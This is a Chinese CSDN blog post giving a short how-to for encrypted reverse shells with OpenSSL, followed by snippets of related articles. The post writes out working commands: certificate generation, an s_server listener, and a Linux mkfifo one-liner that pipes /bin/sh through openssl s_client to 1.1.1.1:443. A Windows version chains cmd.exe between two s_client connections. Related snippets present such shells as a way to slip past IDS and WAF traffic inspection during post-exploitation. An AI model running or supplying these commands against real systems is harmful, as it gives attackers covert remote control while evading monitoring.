openssl 来进行反弹shell

AeeSec

于 2024-08-13 17:50:19 发布

阅读量164

点赞数 3

文章标签： https 服务器网络协议

本文链接：https://blog.csdn.net/Arzum/article/details/141169893

版权

Linux下openssl加密反弹shell

在服务端上生成 SSL 证书的公钥/私钥对

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

2.服务端上监听反弹shell

openssl s_server -quiet -key key.pem -cert cert.pem -port 443

3. 在目标上用openssl加密反弹shell的流量(使用openssl单向认证)

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 1.1.1.1:443 > /tmp/s; rm /tmp/s

Windows下openssl加密反弹shell

1. 服务端开启两个监听，从 ip:port1 获取命令发送给 cmd.exe执行，然后结果返回到 ip:port2。

openssl s_server -quiet -key key.pem -cert cert.pem -port 443
openssl s_server -quiet -key key.pem -cert cert.pem -port 445

2. 客户端执行

openssl s_client -quiet -connect 1.1.1.1:443 | cmd.exe | openssl s_client -quiet -connect 1.1.1.1:445

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

AeeSec

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

反弹shell原理与实现

悦分享

08-02

3357

反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...

linux类反弹shell特征提取

SHELLCODE_8BIT的博客

04-09

2025

1.标准输入0的pipe被转到其他进程，也就是只需要匹配bash的0既然，不需要12也匹配，这样减少性能消耗。这种没有回显，但是可以执行命令。pipe和爷进程交互。

参与评论您还未登录，请先登录后发表或查看评论

使用OpenSSL的反弹shell

mirocky的博客

10-12

532

使用openssl进行反弹shell的过程

OpenSSL反弹加密shell

redwand的博客

02-21

409

在进行红队渗透测试的后渗透阶段为了进一步横行渗透往往需要反弹 shell，这里列出了使用各种语言进行反弹 shell 的方法，我发现这种反弹 shell 方式都有一个缺点，那就是所有的流量都是明文传输的。本文介绍了openssl反弹加密shell的常规方法。

Openssl反弹加密shell

干铮的博客

03-14

906

使用Openssl反弹加密shell 进行渗透测试得后渗透阶段为了进行横向渗透，往往需要反弹shell，如果反弹shell，如果反弹shell都是明文传输，如果内网有IDS或者防护软件会进行流量分析，很快被发现，如果攻击流量回溯分析。就可以复现攻击得过程，此时整个攻击就会被暴漏出来。使用wireshark抓包直接看到输入得命令返回信息，这些命令会被WAF或者IPS所检测所以需要对这些信息进行加密。 ...

红队隧道加密之OpenSSL加密反弹Shell(一)

xf555er的博客

11-26

997

OpenSSL是一个开源的软件库包，应用程序可以使用这个包来进行安全通信，避免窃听，同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上其主要库是以C语言所写成，实现了基本的加密功能，实现了SSL与TLS协议。OpenSSL 可以运行在OpenVMS、 Microsoft Windows以及绝大多数类Unix操作系统上(包括Solaris，Linux，Mac OS X与各种版本的开放源代码BSD操作系统)。它也提供了一个移植版本，可以在IBM i(OS/400)上运作。

反弹shell，一篇概括

最新发布

m0_63733486的博客

06-17

在渗透测试实战中，我们经常会遇到Linux系统环境，而让Linux主机反弹个shell是再常见不过的事情了。反弹shell，就是攻击机监听在某个TCP/UDP端口为服务端，目标机主动发起请求到攻击机监听的端口，并将其命令行的输入输出转到攻击机。在计算机网络上，OpenSSL 是一个开放源代码的软件库包，应用程序可以使用这个包来进行安全通信，避免窃听，同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。

常用的一句话反弹shell总结

橘子女侠

05-20

1万+

目录常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell； 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句话反弹shell 常用的一句话反弹she...

流量加密之OpenSSL反弹加密

Welcome To Myon'Blog !

01-13

728

OpenSSL 是一个强大的、商业级的、功能齐全的开源工具包，用于 TLS（以前称为 SSL）、DTLS 和 QUIC（目前仅限客户端）协议，协议实现基于全功能通用加密库，也可以单独使用，还包括一个加密模块经过验证，符合 FIPS 标准，是一个安全套接字层密码库，囊括主要的密码算法、常用密钥、证书封装管理功能，主要用于实现ssl协议。

反弹Shell，看这一篇就够了

Appleteachers的博客

04-24

1228

前言在渗透测试实战中，我们经常会遇到Linux系统环境，而让Linux主机反弹个shell是再常见不过的事情了。反弹shell，就是攻击机监听在某个TCP/UDP端口为服务端，目标机主动发起请求到攻击机监听的端口，并将其命令行的输入输出转到攻击机。正向连接假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。反向连接那么为什么要用反弹shell呢

openssl安全漏洞解决方案

嵌嵌的爱

12-29

4663

包括openssl和openssh升级，报错，安全漏洞解决等相关内容

利用OpenSSL加密反弹shell流量

The current road is different, love needs to distinguish between right and wrong

02-15

3272

简介在进行后渗透阶段的时候通常为了进一步横向操作往往需要反弹 shell，但是反弹 shell 方式都有一个缺点，流量是以明文方式进行传输的。进行流量分析的话就会很快被发现，如果对攻击流量进行溯源分析，检测带有攻击的特征，就可以复现攻击过程。实验环境 kali：192.168.95.128 centos：192.168.95.147 Wireshark抓包在kali上使用nc监听一个端口 nc -lvvp 4444 将centos的shell反弹过去 bash -i

安全技术系列之反弹Shell

好记性不如烂笔头

03-13

2404

常用反弹shell技术汇总

解决openssh，openssl升级出现的坑

热门推荐

工具人的博客

06-15

6万+

openssh漏洞，openssl升级最新版

利用OpenSSL搭建一个反弹shell

loon208的博客

04-01

603

渗透测试时有很多方法可以获得一个反弹shell，例如netcat、php、perl、.net、lolbins等等。但我最喜欢的方法之一利用是Openssl来获得一个反弹shell。是的，就是那个几乎每个https都要使用的库，我们先用openssl来生成密钥，最后再使用它来获取一个反弹shell。准备首先我们需要在自己的机器上生成密钥，这里用kali来演示。 root@kali#...

openssl master源码目录

明潮的BLOG

12-05

1574

├─apps │ │ apps.c │ │ apps.h │ │ app_rand.c │ │ asn1pars.c │ │ build.info │ │ ca-cert.srl │ │ ca-key.pem │ │ ca-req.pem │ │ ca.c │ │ CA.pl.in │ │ cert.pem │ │ ciphers.c │ │ c

使用 OpenSSL 反弹加密 shell

weixin_30810583的博客

04-12

230

Referrence:https://xax007.github.io/2019-03-07-reverse-encrypted-shell-with-openssl/ 目录前言 OpenSSL 简介使用 OpenSSL 生成证书自签名证书使用 OpenSSL 反弹加密 shell Linux Windows 使用 OpenSSL 搭建简易 HTTPS Ser...

openssl命令_使用OpenSsl加密反弹shell

weixin_39713538的博客

11-24

347

一、实际环境：当我们使用nc等工具进行反弹shell时，流量都是没经过加密，直接传输的，管理员很容易就能发现我们的异常流量，而且现在大部分企业内部都会有各种流量监测设备，所以在这种情况下当我们进行操作时，网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止，因此需要对通信内容进行混淆或加密，这时可以选择使用 OpenSSL 反弹一个加密 shell。OpenSSL ...

openssl加密后的shell脚本还能执行吗

07-10

是的，经过 OpenSSL 加密的 shell 脚本仍然可以执行。OpenSSL 的加密功能是针对文件进行加密，而不是针对脚本本身的执行。当你使用 OpenSSL 加密一个 shell 脚本后，脚本会变成加密的二进制文件你可以使用 OpenSSL 解密该文件，后再执行解密后的脚本。请记住，解密后的脚本可能需要适当的权限才能被执行。